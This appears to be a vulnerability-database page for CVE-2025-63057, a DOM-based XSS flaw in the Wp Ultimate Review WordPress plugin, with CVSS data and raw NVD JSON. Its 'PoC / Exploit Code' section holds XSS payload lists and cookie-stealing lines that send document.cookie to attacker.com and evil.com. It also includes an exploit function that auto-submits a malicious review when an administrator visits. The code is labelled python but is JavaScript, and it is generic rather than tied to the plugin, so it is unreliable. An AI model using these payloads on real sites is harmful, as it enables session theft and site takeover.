Security Vulnerability Report
中文
CVE-2025-63057 CVSS 6.5 MEDIUM

CVE-2025-63057

Published: 2025-12-09 16:18:11
Last Modified: 2026-04-27 19:16:20

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Roxnor Wp Ultimate Review wp-ultimate-review allows DOM-Based XSS.This issue affects Wp Ultimate Review: from n/a through <= 2.3.7.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Wp Ultimate Review <= 2.3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-63057 DOM型XSS PoC // 目标:WordPress插件Wp Ultimate Review <= 2.3.7 // PoC 1: 通过URL参数注入 const pocUrl = 'https://target-site.com/?review=<img src=x onerror=alert(document.cookie)>'; // PoC 2: 通过评论内容注入 const maliciousReview = { content: '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>', rating: 5 }; // PoC 3: 常见的DOM XSS payload const domXssPayloads = [ '<img src=x onerror=alert(document.domain)>', '<svg/onload=alert(document.cookie)>', '<body onload=alert(String.fromCharCode(88,83,83))>', '<iframe src="javascript:alert(\'XSS\')">', 'javascript:alert(document.cookie)' ]; // 攻击场景:攻击者诱导已登录用户访问恶意链接 function exploit() { // 构造恶意链接 const targetUrl = window.location.href.split('?')[0]; const exploitUrl = `${targetUrl}?review_id=<img src=x onerror=fetch('https://evil.com/log?cookie='+document.cookie)>`; // 如果是管理员访问,自动提交恶意评论 if (document.cookie.includes('admin')) { const form = document.querySelector('form[data-action="submit-review"]'); if (form) { form.querySelector('[name="review_content"]').value = domXssPayloads[0]; form.submit(); } } } // 防御检测:检查是否存在漏洞 function checkVulnerability() { const testInput = 'TEST<P>"\'\x00'; const testDiv = document.createElement('div'); testDiv.innerHTML = testInput; // 如果输入被正确编码,说明可能有防护 if (testDiv.innerHTML !== testInput) { console.log('Possible mitigation in place'); } else { console.log('Potential XSS vulnerability detected'); } } // 导出PoC函数供外部调用 window.CVE202563057 = { generatePayload: (payload) => payload, testVulnerability: checkVulnerability, exploit: exploit };

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63057", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:11.103", "lastModified": "2026-04-27T19:16:19.880", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Roxnor Wp Ultimate Review wp-ultimate-review allows DOM-Based XSS.This issue affects Wp Ultimate Review: from n/a through <= 2.3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-ultimate-review/vulnerability/wordpress-wp-ultimate-review-plugin-2-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}